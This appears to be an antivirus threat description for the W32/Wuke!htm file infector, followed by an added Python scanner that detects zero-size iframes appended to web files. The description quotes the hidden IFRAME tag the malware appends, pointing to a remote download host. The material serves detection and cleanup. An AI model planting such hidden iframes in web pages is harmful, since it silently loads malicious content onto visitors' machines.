W32/Wuke!htm

Type: Virus
SubType: -
Discovery Date: 12/12/2006
Length: Varies
Minimum DAT: 4917 (12/12/2006)
Updated DAT: 4972 (02/27/2007)
Minimum Engine: 5.1.00
Description Added: 12/12/2006
Description Modified: 08/20/2007 4:48 AM (PT)
Risk Assessment:
  Corporate User: Low
  Home User: Low

Characteristics

Infected web-based files contain an appended HTML IFRAME (inline-frame) tag which, if rendered, will dynamically download content from a remote web host.

The IFRAME tag in this variant points to the following URL:

  • http://softd.ppandora.com/[HIDDEN]

using the following syntax:

  • iframe src=http://softd.ppandora.com/[HIDDEN] width=0 height=0 /iframe

Symptoms

 - Increased size of .HTM, .HTML, .ASP and .ASPX files.
   - In the case of this variant, such files grew by 71 bytes.

 - Presence of IFRAME tags appended to files with the aforementioned extensions.

 - Unexpected HTTP traffic
   - If an infected file is loaded and rendered in an application, such as a web browser, potentially unexpected HTTP traffic will occur on the network. The destination of such traffic would be the URL mentioned in the Characteristics section of this description.
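
A defender-side check for the symptoms listed above, as an added example that is not part of the original description: it flags zero-size IFRAME tags that sit after the closing </html> tag of .htm, .html, .asp and .aspx files. Treating "appended" as "after the last </html>", the 512-byte tail window for files without that tag, the function names and the sample host are assumptions.

```python
import os
import re

WEB_EXTENSIONS = (".htm", ".html", ".asp", ".aspx")  # file types named in the description

# Opening <iframe ...> tag; attributes are parsed separately so order and quoting do not matter.
IFRAME_RE = re.compile(rb"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(rb"""([a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)
HTML_END_RE = re.compile(rb"</html\s*>", re.IGNORECASE)

def parse_attrs(raw):
    """Return a dict of lower-cased attribute names to values (quoted or unquoted)."""
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(raw):
        attrs[name.lower().decode("ascii")] = (dq or sq or bare).decode("latin-1")
    return attrs

def find_appended_hidden_iframes(data):
    """Return (offset, src) for each zero-size iframe found after the last </html>.
    Files without </html> (e.g. ASP fragments) are checked in their last 512 bytes (assumed window)."""
    ends = [m.end() for m in HTML_END_RE.finditer(data)]
    tail_start = ends[-1] if ends else max(0, len(data) - 512)
    hits = []
    for m in IFRAME_RE.finditer(data, tail_start):
        attrs = parse_attrs(m.group(1))
        if attrs.get("width") == "0" and attrs.get("height") == "0" and "src" in attrs:
            hits.append((m.start(), attrs["src"]))
    return hits

def scan_tree(root):
    """Walk root and map each web file path to its hits (only files with hits are listed)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    hits = find_appended_hidden_iframes(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: a clean page, then the same page with a hidden iframe appended.
CLEAN = b"<html><body><iframe src=/map width=300 height=200></iframe></body></html>\n"
INFECTED = CLEAN + b"<iframe src=http://host.example.invalid/x width=0 height=0></iframe>"
```

The offsets returned show where the appended tag begins, which is the point from which a file would be truncated or restored from a known-good copy.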

Method of Infection

Infection occurs after a system has been infected with the W32/Wuke@MM worm.

Please view the W32/Wuke@MM description for more information on this threat.

Removal

AVERT recommends always using the latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

    N/A

Overview

W32/Wuke@MM infects .HTM, .HTML, .ASP and .ASPX files such that, when they are opened and rendered, they will download malicious content from remote web hosts.
